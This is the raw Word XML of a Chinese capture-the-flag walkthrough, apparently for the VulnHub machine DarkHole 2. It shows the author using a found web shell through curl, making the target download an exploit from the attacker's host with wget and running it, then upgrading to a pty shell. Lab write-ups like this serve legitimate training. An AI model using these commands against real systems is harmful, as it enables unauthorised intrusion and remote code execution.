    <w:p w14:paraId="1268A9F7" w14:textId="7BE7789C" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A0B0469" wp14:editId="27BFE67E">
            <wp:extent cx="5274310" cy="3098800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1694716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166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082F" w14:textId="62B672B2" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里再/opt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web有东西先去看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B588D8B" w14:textId="469B2B28" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D3751F" wp14:editId="3786BF30">
            <wp:extent cx="5274310" cy="3045460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1683237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371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BE14" w14:textId="361E7EF1" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啧啧</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啧</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话木马，是说前面的历史记录好怪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AA6A6" w14:textId="183C8444" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面利用一句话木马进行的操作大概率我们也可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD1477" w14:textId="18C9C98C" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="009D46EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://localhost:9999/?cmd=id</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06CD7837" w14:textId="7A8EAA39" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E254976" wp14:editId="2ABF7527">
            <wp:extent cx="5274310" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="135737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79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96CC" w14:textId="25A63908" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看来是的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25C1CA" w14:textId="0C898ADC" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们直接反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A259D0A" w14:textId="3092261D" w:rsidR="007B1CEE" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CD0577" wp14:editId="5F1E4618">
            <wp:extent cx="5274310" cy="3629660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="868698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980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9EA5" w14:textId="6E7EA384" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE13C5A" w14:textId="6526C883" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE7441A" wp14:editId="122C4C40">
            <wp:extent cx="2476715" cy="1104996"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165374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43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7527" w14:textId="42615470" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用目标机下载exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCAB875" w14:textId="10101166" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB36EF">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB36EF">
        <w:t xml:space="preserve"> 192.168.21.134/exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA5A68" w14:textId="3DA5A9D1" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17708E25" wp14:editId="7FFBE8CC">
            <wp:extent cx="5274310" cy="1203325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="358103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037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260D" w14:textId="51CAEDAF" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动到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目录并执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B468A" w14:textId="4B891D68" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6639EB48" wp14:editId="183A81D4">
            <wp:extent cx="5274310" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="99564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42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E448" w14:textId="5B1A6B5C" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F957D18" wp14:editId="79528FEF">
            <wp:extent cx="5274310" cy="985520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="2077531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318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6635" w14:textId="35AD7C52" w:rsidR="00CB36EF" w:rsidRDefault="00CB36EF" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB36EF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="00B244BB" w:rsidRPr="009D46EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://localhost:9999/?cmd=bash%20/tmp/exp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D8E4AE1" w14:textId="0A32FE40" w:rsidR="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00791CA4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61508975" wp14:editId="69B62DC9">
            <wp:extent cx="4900085" cy="2324301"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126158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82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FB90" w14:textId="0D70DB54" w:rsidR="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E235AD" w14:textId="0BD1E847" w:rsidR="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优化shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA6715" w14:textId="5BF16250" w:rsidR="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00791CA4">
        <w:t xml:space="preserve">python3 -c "import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00791CA4">
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00791CA4">
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00791CA4">
        <w:t>('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896AB8C" w14:textId="4A97D05D" w:rsidR="00791CA4" w:rsidRPr="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791CA4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D216B28" wp14:editId="4618C289">
            <wp:extent cx="4442845" cy="457240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1860759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5997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22AE" w14:textId="787A4B2B" w:rsidR="00B244BB" w:rsidRDefault="00B244BB" w:rsidP="00B244BB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查看历史命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778702CC" w14:textId="6AFF0555" w:rsidR="00B244BB" w:rsidRPr="00B244BB" w:rsidRDefault="00791CA4" w:rsidP="00B244BB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791CA4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1D46B248" wp14:editId="3C322695">
            <wp:extent cx="3444538" cy="2796782"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="909668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685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A8BC" w14:textId="44A41AC6" w:rsidR="00B244BB" w:rsidRDefault="00791CA4" w:rsidP="00B244BB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00791CA4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A3F19F" wp14:editId="187CDD46">
            <wp:extent cx="5274310" cy="1953895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="57660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02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BDD2" w14:textId="18E1B325" w:rsidR="00791CA4" w:rsidRDefault="00791CA4" w:rsidP="00B244BB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61382DD0" w14:textId="77777777" w:rsidR="00791CA4" w:rsidRPr="00B244BB" w:rsidRDefault="00791CA4" w:rsidP="00B244BB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00791CA4" w:rsidRPr="00B244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C48DF" w14:textId="77777777" w:rsidR="004A6343" w:rsidRDefault="004A6343" w:rsidP="006B7095">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24AE4092" w14:textId="77777777" w:rsidR="004A6343" w:rsidRDefault="004A6343" w:rsidP="006B70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50413" w14:textId="77777777" w:rsidR="004A6343" w:rsidRDefault="004A6343" w:rsidP="006B7095">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33B0F153" w14:textId="77777777" w:rsidR="004A6343" w:rsidRDefault="004A6343" w:rsidP="006B70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39E"/>
    <w:rsid w:val="00046A51"/>
    <w:rsid w:val="001D6777"/>
    <w:rsid w:val="0041235C"/>
    <w:rsid w:val="004A6343"/>
    <w:rsid w:val="0056526C"/>
    <w:rsid w:val="00603939"/>
    <w:rsid w:val="006B7095"/>
    <w:rsid w:val="00791CA4"/>
    <w:rsid w:val="007B039E"/>
    <w:rsid w:val="007B1CEE"/>
    <w:rsid w:val="00A048B3"/>
    <w:rsid w:val="00B244BB"/>
    <w:rsid w:val="00B8751D"/>
    <w:rsid w:val="00CB36EF"/>
    <w:rsid w:val="00DC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61979"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B27070A3-A523-400B-B855-B952FA0A1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526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6526C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6B709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B709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B70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B70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host:9999/?cmd=id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gitcode.net/mirrors/WangYihang/GitHacker.git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mailto:jehad@192.168.21.145" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/?cmd=bash%20/tmp/exp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hyperlink" Target="https://vulnhub.com/entry/darkhole-2,740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259</Words>
  <Characters>1478</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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泽巍</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>吴 泽巍</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-19T05:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T15:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>